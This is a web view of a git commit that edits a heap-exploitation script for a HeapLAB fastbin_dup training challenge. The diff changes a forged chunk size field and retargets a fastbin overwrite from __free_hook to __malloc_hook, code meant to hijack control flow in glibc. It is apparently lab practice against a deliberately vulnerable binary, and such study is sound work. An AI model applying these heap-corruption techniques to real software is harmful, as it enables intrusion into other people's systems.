diff options
author | Brett Weiland <brett_weiland@bpcspace.com> | 2021-01-04 18:48:38 -0600 |
---|---|---|
committer | Brett Weiland <brett_weiland@bpcspace.com> | 2021-01-04 18:48:38 -0600 |
commit | 4c06c05f4eaf614ff0dfd4fe0fa62557331d7fb7 (patch) | |
tree | a0b03ab87597378ba0e71dd54ef0cd4a550a03e0 /HeapLAB/challenge-fastbin_dup/bruh.py | |
parent | ba02c1bd6981675aaf5a0b6cddb7457e53d5eed1 (diff) |
modified: HeapLAB/challenge-fastbin_dup/.gdb_history
modified: HeapLAB/challenge-fastbin_dup/bruh.py
Diffstat (limited to 'HeapLAB/challenge-fastbin_dup/bruh.py')
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/bruh.py | 7 |
1 files changed, 4 insertions, 3 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py index 191cbea..56b0c71 100755 --- a/HeapLAB/challenge-fastbin_dup/bruh.py +++ b/HeapLAB/challenge-fastbin_dup/bruh.py @@ -55,7 +55,7 @@ free(chunk1) #malloc(24, p64(libc.sym.main_arena + 96)) #this sets up a fake size field in the fastbins -malloc(24, p64(0x81)) +malloc(24, p64(0x80)) malloc(24, 'asdf') malloc(24, 'asdf') @@ -74,9 +74,10 @@ malloc(119, 'sdfg') #8 * 9 -malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16)) +payload_loc = libc.sym.__malloc_hook - 35 +malloc(119, p64(0)*9 + p64(payload_loc)) -print(hex(fake_chunk_loc)) +print("top chunk addr: {}".format(hex(payload_loc))) # ============================================================================= |